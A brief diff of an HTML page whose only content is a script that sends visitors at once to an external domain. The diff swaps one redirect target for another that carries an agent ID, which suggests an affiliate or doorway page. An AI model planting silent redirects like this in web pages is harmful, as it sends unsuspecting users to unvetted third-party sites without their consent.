--- a/47.html
+++ b/47.html
@@ -1,4 +1,3 @@
-    
 <script>
-  window.location.href="https://dl.hawcyy.com/?parent=158113&t=1592627981"
+  window.location.href="https://main.RY872.com/?AgentId=202048"
 </script>
